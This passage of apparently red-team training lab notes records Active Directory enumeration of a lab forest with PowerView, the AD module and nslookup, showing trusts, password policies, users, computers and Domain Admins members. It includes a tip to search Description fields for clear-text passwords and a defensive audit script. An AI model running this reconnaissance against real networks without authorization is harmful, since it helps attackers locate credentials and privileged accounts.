DC=dollarcorp,DC=moneycorp,DC=local...}

PS C:\Users\student163> Get-DomainController -Domain moneycorp.local

Forest : moneycorp.local
CurrentTime : 6/12/2024 12:13:55 PM
HighestCommittedUsn : 226250
OSVersion : Windows Server 2022 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : moneycorp.local
IPAddress : 172.16.1.1
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {29f15465-5ef6-4d0a-b600-87bf6f56a5a8, cb4a4e84-ab09-4e4a-8365-
a28ffac2d701}
OutboundConnections : {f06c66a3-2e50-4f42-8078-d022cbf1db27, 38e5d7cd-72fd-4b39-bcbf-
9761d5a4c018}
Name : mcorp-dc.moneycorp.local
Partitions : {DC=moneycorp,DC=local, CN=Configuration,DC=moneycorp,DC=local,
CN=Schema,CN=Configuration,DC=moneycorp,DC=local,
DC=DomainDnsZones,DC=moneycorp,DC=local...}

PS C:\Users\student163> Get-DomainController -Domain eurocorp.local

Forest : eurocorp.local
CurrentTime : 6/12/2024 12:14:07 PM
HighestCommittedUsn : 97337
OSVersion : Windows Server 2022 Standard
Roles : {SchemaRole, NamingRole, PdcRole, RidRole...}
Domain : eurocorp.local
IPAddress : 172.16.15.1
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {31ecd411-0565-4989-a695-54cfe44acae5}
OutboundConnections : {e7cbb037-4852-4cfe-921f-04c3f02879e7}
Name : eurocorp-dc.eurocorp.local
Partitions : {DC=eurocorp,DC=local, CN=Configuration,DC=eurocorp,DC=local,
CN=Schema,CN=Configuration,DC=eurocorp,DC=local,
DC=DomainDnsZones,DC=eurocorp,DC=local...}

Getting Trust Details


PS C:\Users\student163> Get-DomainTrust

SourceName : dollarcorp.moneycorp.local
TargetName : moneycorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 5:59:01 AM
WhenChanged : 6/12/2024 5:05:17 AM

SourceName : dollarcorp.moneycorp.local
TargetName : us.dollarcorp.moneycorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 6:22:51 AM
WhenChanged : 6/12/2024 5:01:39 AM

SourceName : dollarcorp.moneycorp.local
TargetName : eurocorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 8:15:23 AM
WhenChanged : 5/18/2024 3:14:25 PM

PS C:\Users\student163> Get-DomainTrust -Domain eurocorp.local

SourceName : eurocorp.local
TargetName : eu.eurocorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : WITHIN_FOREST
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 5:49:08 AM
WhenChanged : 6/12/2024 5:18:41 AM

SourceName : eurocorp.local
TargetName : dollarcorp.moneycorp.local
TrustType : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : FILTER_SIDS
TrustDirection : Bidirectional
WhenCreated : 11/12/2022 8:15:23 AM
WhenChanged : 5/18/2024 3:14:25 PM

Getting Domain Password Policy


PS C:\Users\student163> (Get-DomainPolicydata).systemaccess

MinimumPasswordAge : 1
MaximumPasswordAge : 42
MinimumPasswordLength : 7
PasswordComplexity : 1
PasswordHistorySize : 24
LockoutBadCount : 0
RequireLogonToChangePassword : 0
ForceLogoffWhenHourExpire : 0
ClearTextPassword : 0
LSAAnonymousNameLookup : 0
PS C:\Users\student163> (Get-DomainPolicydata -Domain moneycorp.local).systemaccess

MinimumPasswordAge : 1
MaximumPasswordAge : 42
MinimumPasswordLength : 7
PasswordComplexity : 1
PasswordHistorySize : 24
LockoutBadCount : 0
RequireLogonToChangePassword : 0
ForceLogoffWhenHourExpire : 0
ClearTextPassword : 0
LSAAnonymousNameLookup : 0

PS C:\Users\student163> (Get-DomainPolicydata -Domain eurocorp.local).systemaccess

MinimumPasswordAge : 1
MaximumPasswordAge : 42
MinimumPasswordLength : 7
PasswordComplexity : 1
PasswordHistorySize : 24
LockoutBadCount : 0
RequireLogonToChangePassword : 0
ForceLogoffWhenHourExpire : 0
ClearTextPassword : 0
LSAAnonymousNameLookup : 0

Getting Kerberos Policy


PS C:\Users\student163> (Get-DomainPolicydata).KerberosPolicy

MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1

PS C:\Users\student163> (Get-DomainPolicydata -Domain moneycorp.local).KerberosPolicy

MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1

PS C:\Users\student163> (Get-DomainPolicydata -Domain eurocorp.local).KerberosPolicy


MaxTicketAge : 10
MaxRenewAge : 7
MaxServiceAge : 600
MaxClockSkew : 5
TicketValidateClient : 1

Using .NET Methods and nslookup


Getting the Forest, Domain, Child Domain and the Domain Controllers details
PS C:\Users\student163> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()

Forest : moneycorp.local
DomainControllers : {dcorp-dc.dollarcorp.moneycorp.local}
Children : {us.dollarcorp.moneycorp.local}
DomainMode : Unknown
DomainModeLevel : 7
Parent : moneycorp.local
PdcRoleOwner : dcorp-dc.dollarcorp.moneycorp.local
RidRoleOwner : dcorp-dc.dollarcorp.moneycorp.local
InfrastructureRoleOwner : dcorp-dc.dollarcorp.moneycorp.local
Name : dollarcorp.moneycorp.local

Getting the Forest, Domain and the Domain Controllers details


PS C:\Users\student163> [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain().DomainControllers

Forest : moneycorp.local
CurrentTime : 6/18/2024 4:30:08 AM
HighestCommittedUsn : 1181007
OSVersion : Windows Server 2022 Standard
Roles : {PdcRole, RidRole, InfrastructureRole}
Domain : dollarcorp.moneycorp.local
IPAddress : 172.16.2.1
SiteName : Default-First-Site-Name
SyncFromAllServersCallback :
InboundConnections : {83cb5211-27b5-41d1-afcf-6e9fbd30de06, f06c66a3-2e50-4f42-8078-
d022cbf1db27}
OutboundConnections : {cb4a4e84-ab09-4e4a-8365-a28ffac2d701, 5cc72b32-ff79-4bb0-8599-
e8be4520eeb3}
Name : dcorp-dc.dollarcorp.moneycorp.local
Partitions : {CN=Configuration,DC=moneycorp,DC=local,
CN=Schema,CN=Configuration,DC=moneycorp,DC=local,
DC=ForestDnsZones,DC=moneycorp,DC=local,
DC=dollarcorp,DC=moneycorp,DC=local...}

Getting the Read Write Domain Controllers of the Domain

PS C:\Users\student163> nslookup -querytype=SRV _LDAP._TCP.DC._MSDCS.dollarcorp.moneycorp.local
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 172.16.2.1
_LDAP._TCP.DC._MSDCS.dollarcorp.moneycorp.local SRV service location:
priority = 0
weight = 100
port = 389
svr hostname = dcorp-dc.dollarcorp.moneycorp.local
dcorp-dc.dollarcorp.moneycorp.local internet address = 172.16.2.1
PS C:\Users\student163> nslookup -querytype=SRV _KERBEROS._TCP.dollarcorp.moneycorp.local
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 172.16.2.1

_KERBEROS._TCP.dollarcorp.moneycorp.local SRV service location:


priority = 0
weight = 100
port = 88
svr hostname = dcorp-dc.dollarcorp.moneycorp.local
dcorp-dc.dollarcorp.moneycorp.local internet address = 172.16.2.1
PS C:\Users\student163> nslookup -querytype=SRV _KPASSWD._TCP.dollarcorp.moneycorp.local
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 172.16.2.1

_KPASSWD._TCP.dollarcorp.moneycorp.local SRV service location:


priority = 0
weight = 100
port = 464
svr hostname = dcorp-dc.dollarcorp.moneycorp.local
dcorp-dc.dollarcorp.moneycorp.local internet address = 172.16.2.1
PS C:\Users\student163> nslookup -querytype=SRV _GC._TCP.moneycorp.local
DNS request timed out.
timeout was 2 seconds.
Server: UnKnown
Address: 172.16.2.1

Non-authoritative answer:
_GC._TCP.moneycorp.local SRV service location:
priority = 0
weight = 100
port = 3268
svr hostname = us-dc.us.dollarcorp.moneycorp.local
_GC._TCP.moneycorp.local SRV service location:
priority = 0
weight = 100
port = 3268
svr hostname = mcorp-dc.moneycorp.local
_GC._TCP.moneycorp.local SRV service location:
priority = 0
weight = 100
port = 3268
svr hostname = dcorp-dc.dollarcorp.moneycorp.local

us-dc.us.dollarcorp.moneycorp.local internet address = 172.16.9.1


mcorp-dc.moneycorp.local internet address = 172.16.1.1
dcorp-dc.dollarcorp.moneycorp.local internet address = 172.16.2.1

User Enumeration
Using AD Module
Getting Details of all users
PS C:\Ad\Tools\ADModule-master> Get-ADUser -Filter * -Properties *

Getting Details of a specific user


PS C:\Ad\Tools\ADModule-master> Get-ADUser -Identity student163 -Properties *

AccountExpirationDate :
accountExpires : 0
AccountLockoutTime :
AccountNotDelegated : False
AllowReversiblePasswordEncryption : False
AuthenticationPolicy : {}
AuthenticationPolicySilo : {}
BadLogonCount : 1582
badPasswordTime : 133626696708478691
badPwdCount : 1582
CannotChangePassword : False
CanonicalName : dollarcorp.moneycorp.local/Users/student163
Certificates : {}
City :
CN : student163
codePage : 0
Company :
CompoundIdentitySupported : {}
Country :
countryCode : 0
Created : 2/21/2024 2:29:23 AM
createTimeStamp : 2/21/2024 2:29:23 AM
Deleted :
Department :
Description :
DisplayName : student163
DistinguishedName : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
Division :
DoesNotRequirePreAuth : False
dSCorePropagationData : {2/21/2024 2:29:23 AM, 12/31/1600 4:00:00 PM}
EmailAddress :
EmployeeID :
EmployeeNumber :
Enabled : True
Fax :
GivenName : student163
HomeDirectory :
HomedirRequired : False
HomeDrive :
HomePage :
HomePhone :
Initials :
instanceType : 4
isDeleted :
KerberosEncryptionType : {}
LastBadPasswordAttempt : 6/12/2024 5:41:10 AM
LastKnownParent :
lastLogoff : 0
lastLogon : 133626680475736068
LastLogonDate : 6/11/2024 10:06:24 PM
lastLogonTimestamp : 133626423845760631
LockedOut : False
logonCount : 19
logonHours : {255, 255, 255, 255...}
LogonWorkstations :
Manager :
MemberOf : {CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local}
MNSLogonAccount : False
MobilePhone :
Modified : 6/11/2024 10:06:24 PM
modifyTimeStamp : 6/11/2024 10:06:24 PM
msDS-User-Account-Control-Computed : 0
Name : student163
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
ObjectClass : user
ObjectGUID : 09a610a4-e9e6-4672-a07b-2fcc7d26b1c7
objectSid : S-1-5-21-719815819-3726368948-3917688648-13603
Office :
OfficePhone :
Organization :
OtherName :
PasswordExpired : False
PasswordLastSet : 2/21/2024 3:10:40 AM
PasswordNeverExpires : True
PasswordNotRequired : False
POBox :
PostalCode :
PrimaryGroup : CN=Domain Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
primaryGroupID : 513
PrincipalsAllowedToDelegateToAccount : {}
ProfilePath :
ProtectedFromAccidentalDeletion : False
pwdLastSet : 133529874401633202
SamAccountName : student163
sAMAccountType : 805306368
ScriptPath :
sDRightsEffective : 0
ServicePrincipalNames : {}
SID : S-1-5-21-719815819-3726368948-3917688648-13603
SIDHistory : {}
SmartcardLogonRequired : False
State :
StreetAddress :
Surname :
Title :
TrustedForDelegation : False
TrustedToAuthForDelegation : False
UseDESKeyOnly : False
userAccountControl : 66048
userCertificate : {}
UserPrincipalName : [email protected]
uSNChanged : 1139193
uSNCreated : 200949
whenChanged : 6/11/2024 10:06:24 PM
whenCreated : 2/21/2024 2:29:23 AM

Description attribute enumeration - It is very important to know how to enumerate the Description attribute of user objects: administrators sometimes store clear-text passwords for service accounts there, so it is always worth checking.
PS C:\Ad\Tools\ADModule-master> Get-ADUser -Filter 'Description -like "*built*"' -Properties Description | Select Name, Description

Name Description
---- -----------
Administrator Built-in account for administering the computer/domain
Guest Built-in account for guest access to the computer/domain

Using PowerView
Getting Details of all users
PS C:\Users\student163> Get-DomainUser

Getting Details of a specific user


PS C:\Users\student163> Get-DomainUser -Identity student163 -Properties *

logoncount : 19
badpasswordtime : 6/12/2024 5:47:32 AM
distinguishedname : CN=student163,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, person, organizationalPerson, user}
displayname : student163
lastlogontimestamp : 6/11/2024 10:06:24 PM
userprincipalname : [email protected]
samaccountname : student163
logonhours : @{Tuesday=System.Collections.Hashtable;
Friday=System.Collections.Hashtable;
Wednesday=System.Collections.Hashtable;
Saturday=System.Collections.Hashtable;
Thursday=System.Collections.Hashtable;
Monday=System.Collections.Hashtable;
Sunday=System.Collections.Hashtable}
codepage : 0
samaccounttype : USER_OBJECT
accountexpires : 12/31/1600 4:00:00 PM
countrycode : 0
whenchanged : 6/12/2024 5:06:24 AM
instancetype : 4
usncreated : 200949
objectguid : 09a610a4-e9e6-4672-a07b-2fcc7d26b1c7
lastlogoff : 12/31/1600 4:00:00 PM
whencreated : 2/21/2024 10:29:23 AM
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
dscorepropagationdata : {2/21/2024 10:29:23 AM, 1/1/1601 12:00:00 AM}
givenname : student163
usnchanged : 1139193
memberof : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
lastlogon : 6/12/2024 5:14:07 AM
badpwdcount : 1954
cn : student163
useraccountcontrol : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
objectsid : S-1-5-21-719815819-3726368948-3917688648-13603
primarygroupid : 513
pwdlastset : 2/21/2024 3:10:40 AM
name : student163

Description attribute enumeration
PS C:\Users\student163> Get-DomainUser -LDAPFilter "Description=*built*" | Select Name, Description

name description
---- -----------
Administrator Built-in account for administering the computer/domain
Guest Built-in account for guest access to the computer/domain
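The two Description queries above (AD module and PowerView) only match one literal word. The following added example, which is not part of the CRTP notes, turns the same idea into a defender's audit with the ActiveDirectory module: it pulls every user that has a Description at all, matches it against a keyword list (the list itself is an assumption, adjust it to the organisation's vocabulary) and records the hits for remediation, flagging accounts with a ServicePrincipalName because service accounts are where such notes usually end up.

```powershell
# Added example (not from the CRTP notes): audit user Description attributes for
# password-like content using the ActiveDirectory module.
Import-Module ActiveDirectory

# Assumed keyword list; 'pass' also covers 'password' and 'passwd'.
$keywords = @('pass', 'pwd', 'cred', 'secret')
$pattern  = ($keywords | ForEach-Object { [regex]::Escape($_) }) -join '|'

# Server-side LDAP filter: only return objects that carry a Description at all.
$users = Get-ADUser -Filter 'Description -like "*"' `
                    -Properties Description, Enabled, ServicePrincipalName, PasswordLastSet

$findings = $users |
    Where-Object { $_.Description -match $pattern } |   # -match is case-insensitive
    ForEach-Object {
        [pscustomobject]@{
            SamAccountName  = $_.SamAccountName
            Enabled         = $_.Enabled
            HasSPN          = [bool]$_.ServicePrincipalName   # service account indicator
            PasswordLastSet = $_.PasswordLastSet
            Description     = $_.Description
        }
    }

$findings | Format-Table -AutoSize

# Keep a record for remediation tracking: clear the attribute, then rotate the password,
# since anyone with read access to the directory has already seen it.
$findings | Export-Csv -Path .\description-audit.csv -NoTypeInformation
```

Every authenticated domain user can read Description by default, which is why the fix is both to clear the attribute and to rotate the exposed password, not just one of the two.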

Computer Enumeration
Using AD Module
Getting Details of all the computers
PS C:\Ad\Tools\ADModule-master> Get-ADComputer -Filter * -Properties *

Getting details of machines with specific Operating systems


PS C:\Ad\Tools\ADModule-master> Get-ADComputer -Filter 'OperatingSystem -like "*Server 2022*"' -Properties OperatingSystem | Select Name, OperatingSystem

Name OperatingSystem
---- ---------------
DCORP-DC Windows Server 2022 Standard
DCORP-ADMINSRV Windows Server 2022 Datacenter
DCORP-APPSRV Windows Server 2022 Datacenter
DCORP-CI Windows Server 2022 Datacenter
DCORP-MGMT Windows Server 2022 Datacenter
DCORP-MSSQL Windows Server 2022 Datacenter
DCORP-SQL1 Windows Server 2022 Datacenter
DCORP-STDADMIN Windows Server 2022 Standard
DCORP-STD161 Windows Server 2022 Standard
DCORP-STD162 Windows Server 2022 Standard
DCORP-STD163 Windows Server 2022 Standard
DCORP-STD164 Windows Server 2022 Standard
DCORP-STD165 Windows Server 2022 Standard
DCORP-STD166 Windows Server 2022 Standard
DCORP-STD168 Windows Server 2022 Standard
DCORP-STD167 Windows Server 2022 Standard
DCORP-STD169 Windows Server 2022 Standard
DCORP-STD170 Windows Server 2022 Standard
DCORP-STD171 Windows Server 2022 Standard
DCORP-STD172 Windows Server 2022 Standard
DCORP-STD173 Windows Server 2022 Standard
DCORP-STD174 Windows Server 2022 Standard
DCORP-STD175 Windows Server 2022 Standard
DCORP-STD176 Windows Server 2022 Standard
DCORP-STD177 Windows Server 2022 Standard
DCORP-STD178 Windows Server 2022 Standard
DCORP-STD180 Windows Server 2022 Standard
DCORP-STD179 Windows Server 2022 Standard

Using PowerView
Getting Details of all the computers
PS C:\Users\student163> Get-DomainComputer -Properties *

Getting Details of Computers with specific Operating systems


PS C:\Users\student163> Get-DomainComputer -OperatingSystem "*Server 2022*" | select cn,operatingsystem

cn operatingsystem
-- ---------------
DCORP-DC Windows Server 2022 Standard
DCORP-ADMINSRV Windows Server 2022 Datacenter
DCORP-APPSRV Windows Server 2022 Datacenter
DCORP-CI Windows Server 2022 Datacenter
DCORP-MGMT Windows Server 2022 Datacenter
DCORP-MSSQL Windows Server 2022 Datacenter
DCORP-SQL1 Windows Server 2022 Datacenter
DCORP-STDADMIN Windows Server 2022 Standard
DCORP-STD161 Windows Server 2022 Standard
DCORP-STD162 Windows Server 2022 Standard
DCORP-STD163 Windows Server 2022 Standard
DCORP-STD164 Windows Server 2022 Standard
DCORP-STD165 Windows Server 2022 Standard
DCORP-STD166 Windows Server 2022 Standard
DCORP-STD168 Windows Server 2022 Standard
DCORP-STD167 Windows Server 2022 Standard
DCORP-STD169 Windows Server 2022 Standard
DCORP-STD170 Windows Server 2022 Standard
DCORP-STD171 Windows Server 2022 Standard
DCORP-STD172 Windows Server 2022 Standard
DCORP-STD173 Windows Server 2022 Standard
DCORP-STD174 Windows Server 2022 Standard
DCORP-STD175 Windows Server 2022 Standard
DCORP-STD176 Windows Server 2022 Standard
DCORP-STD177 Windows Server 2022 Standard
DCORP-STD178 Windows Server 2022 Standard
DCORP-STD180 Windows Server 2022 Standard
DCORP-STD179 Windows Server 2022 Standard
Group Enumeration
Using AD Module
Getting the details of all the groups
PS C:\Ad\Tools\ADModule-master> Get-ADGroup -Filter * -Properties * | Select CN

CN
--
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
DnsAdmins
DnsUpdateProxy
RDP Users

Getting the details of the groups which have "admin" in their name
PS C:\Ad\Tools\ADModule-master> Get-ADGroup -Filter 'Name -like "*admin*"' | Select name

name
----
Administrators
Hyper-V Administrators
Storage Replica Administrators
Domain Admins
Key Admins
DnsAdmins

Getting the members of a Domain Group


PS C:\Ad\Tools\ADModule-master> Get-ADGroupMember -Identity "Domain Admins"

distinguishedName : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
name : Administrator
objectClass : user
objectGUID : d954e824-f549-47c2-9809-646c218cef36
SamAccountName : Administrator
SID : S-1-5-21-719815819-3726368948-3917688648-500

distinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local


name : svc admin
objectClass : user
objectGUID : 244f9c84-7e33-4ed6-aca1-3328d0802db0
SamAccountName : svcadmin
SID : S-1-5-21-719815819-3726368948-3917688648-1118

PS C:\Ad\Tools\ADModule-master> Get-ADGroupMember -Identity "Domain Admins" -Recursive

distinguishedName : CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
name : Administrator
objectClass : user
objectGUID : d954e824-f549-47c2-9809-646c218cef36
SamAccountName : Administrator
SID : S-1-5-21-719815819-3726368948-3917688648-500

distinguishedName : CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local


name : svc admin
objectClass : user
objectGUID : 244f9c84-7e33-4ed6-aca1-3328d0802db0
SamAccountName : svcadmin
SID : S-1-5-21-719815819-3726368948-3917688648-1118

Getting Group Membership of a user


PS C:\Ad\Tools\ADModule-master> Get-ADPrincipalGroupMembership -Identity "student163"

distinguishedName : CN=Domain Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local


GroupCategory : Security
GroupScope : Global
name : Domain Users
objectClass : group
objectGUID : 62eb9236-f62f-4f53-938b-042a559741e7
SamAccountName : Domain Users
SID : S-1-5-21-719815819-3726368948-3917688648-513

distinguishedName : CN=RDP Users,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local


GroupCategory : Security
GroupScope : Global
name : RDP Users
objectClass : group
objectGUID : 09a8ff04-9b4e-4ed8-abaa-d8ffccf6d4c6
SamAccountName : RDPUsers
SID : S-1-5-21-719815819-3726368948-3917688648-1123

Getting the list of Disabled accounts


PS C:\Windows\system32> Get-DomainUser -UACFilter ACCOUNTDISABLE | Select CN

cn
--
Guest
krbtgt

Using PowerView
Getting the details of all the groups
PS C:\Users\student163> Get-DomainGroup | Select Name

name
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
DnsAdmins
DnsUpdateProxy
RDP Users

Getting the details of the groups which have "admin" in their name
PS C:\Users\student163> Get-DomainGroup *admin*

grouptype : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY


admincount : 1
iscriticalsystemobject : True
samaccounttype : ALIAS_OBJECT
samaccountname : Administrators
systemflags : -1946157056
objectsid : S-1-5-32-544
objectclass : {top, group}
cn : Administrators
usnchanged : 13126
dscorepropagationdata : {11/12/2022 6:14:52 AM, 11/12/2022 5:59:41 AM, 1/1/1601 12:04:16 AM}
name : Administrators
description : Administrators have complete and unrestricted access to the computer/domain
distinguishedname : CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local
member : {CN=Enterprise Admins,CN=Users,DC=moneycorp,DC=local, CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local, CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local}
usncreated : 8199
whencreated : 11/12/2022 5:59:01 AM
whenchanged : 11/12/2022 6:29:52 AM
instancetype : 4
objectguid : 598de368-27e8-4d00-99b0-c32895f84232
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

grouptype : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY


systemflags : -1946157056
iscriticalsystemobject : True
samaccounttype : ALIAS_OBJECT
samaccountname : Hyper-V Administrators
whenchanged : 11/12/2022 5:59:01 AM
objectsid : S-1-5-32-578
objectclass : {top, group}
cn : Hyper-V Administrators
usnchanged : 8229
dscorepropagationdata : {11/12/2022 5:59:41 AM, 1/1/1601 12:00:01 AM}
name : Hyper-V Administrators
description : Members of this group have complete and unrestricted access to all features of Hyper-V.
distinguishedname : CN=Hyper-V Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local
usncreated : 8229
whencreated : 11/12/2022 5:59:01 AM
instancetype : 4
objectguid : 477e3360-275a-4cec-983d-11e55cee0e46
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

grouptype : CREATED_BY_SYSTEM, DOMAIN_LOCAL_SCOPE, SECURITY


systemflags : -1946157056
iscriticalsystemobject : True
samaccounttype : ALIAS_OBJECT
samaccountname : Storage Replica Administrators
whenchanged : 11/12/2022 5:59:01 AM
objectsid : S-1-5-32-582
objectclass : {top, group}
cn : Storage Replica Administrators
usnchanged : 8232
dscorepropagationdata : {11/12/2022 5:59:41 AM, 1/1/1601 12:00:01 AM}
name : Storage Replica Administrators
description : Members of this group have complete and unrestricted access to all features of Storage Replica.
distinguishedname : CN=Storage Replica Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local
usncreated : 8232
whencreated : 11/12/2022 5:59:01 AM
instancetype : 4
objectguid : acdd05e6-1435-424b-aae1-37aa868c78d8
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

grouptype : GLOBAL_SCOPE, SECURITY


admincount : 1
iscriticalsystemobject : True
samaccounttype : GROUP_OBJECT
samaccountname : Domain Admins
whenchanged : 11/14/2022 5:06:37 PM
objectsid : S-1-5-21-719815819-3726368948-3917688648-512
name : Domain Admins
cn : Domain Admins
instancetype : 4
usnchanged : 40124
dscorepropagationdata : {11/12/2022 6:14:52 AM, 11/12/2022 5:59:41 AM, 1/1/1601 12:04:16 AM}
objectguid : 7d766421-bcf7-40b1-a970-17da0bedb489
description : Designated administrators of the domain
memberof : {CN=Denied RODC Password Replication Group,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local, CN=Administrators,CN=Builtin,DC=dollarcorp,DC=moneycorp,DC=local}
member : {CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local, CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local}
usncreated : 12315
whencreated : 11/12/2022 5:59:41 AM
distinguishedname : CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
objectclass : {top, group}
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
grouptype : GLOBAL_SCOPE, SECURITY
admincount : 1
iscriticalsystemobject : True
samaccounttype : GROUP_OBJECT
samaccountname : Key Admins
whenchanged : 11/12/2022 6:14:52 AM
objectsid : S-1-5-21-719815819-3726368948-3917688648-526
objectclass : {top, group}
cn : Key Admins
usnchanged : 12945
dscorepropagationdata : {11/12/2022 6:14:52 AM, 11/12/2022 5:59:41 AM, 1/1/1601 12:04:16 AM}
name : Key Admins
description : Members of this group can perform administrative actions on key objects within the domain.
distinguishedname : CN=Key Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
usncreated : 12409
whencreated : 11/12/2022 5:59:41 AM
instancetype : 4
objectguid : 0a5c3344-9caf-45d5-9fd3-909a76045d63
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

grouptype : DOMAIN_LOCAL_SCOPE, SECURITY


name : DnsAdmins
samaccounttype : ALIAS_OBJECT
samaccountname : DnsAdmins
whenchanged : 11/14/2022 12:56:21 PM
objectsid : S-1-5-21-719815819-3726368948-3917688648-1101
objectclass : {top, group}
cn : DnsAdmins
usnchanged : 38235
dscorepropagationdata : 1/1/1601 12:00:00 AM
description : DNS Administrators Group
distinguishedname : CN=DnsAdmins,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
member : CN=srv admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
usncreated : 12440
whencreated : 11/12/2022 6:00:24 AM
instancetype : 4
objectguid : d7358d36-dc01-4450-8269-f716fbf2e5dd
objectcategory : CN=Group,CN=Schema,CN=Configuration,DC=moneycorp,DC=local

Getting the details of the groups from the parent domain


PS C:\Users\student163> Get-DomainGroup -Domain moneycorp.local | Select name

name
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
Access Control Assistance Operators
Remote Management Users
Storage Replica Administrators
Domain Computers
Domain Controllers
Schema Admins
Enterprise Admins
Cert Publishers
Domain Admins
Domain Users
Domain Guests
Group Policy Creator Owners
RAS and IAS Servers
Server Operators
Account Operators
Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders
Windows Authorization Access Group
Terminal Server License Servers
Allowed RODC Password Replication Group
Denied RODC Password Replication Group
Read-only Domain Controllers
Enterprise Read-only Domain Controllers
Cloneable Domain Controllers
Protected Users
Key Admins
Enterprise Key Admins
DnsAdmins
DnsUpdateProxy

Getting the details of the groups from the trusting domain


PS C:\Users\student163> Get-DomainGroup -Domain eurocorp.local | Select name

name
----
Administrators
Users
Guests
Print Operators
Backup Operators
Replicator
Remote Desktop Users
Network Configuration Operators
Performance Monitor Users
Performance Log Users
Distributed COM Users
IIS_IUSRS
Cryptographic Operators
Event Log Readers
Certificate Service DCOM Access
RDS Remote Access Servers
RDS Endpoint Servers
RDS Management Servers
Hyper-V Administrators
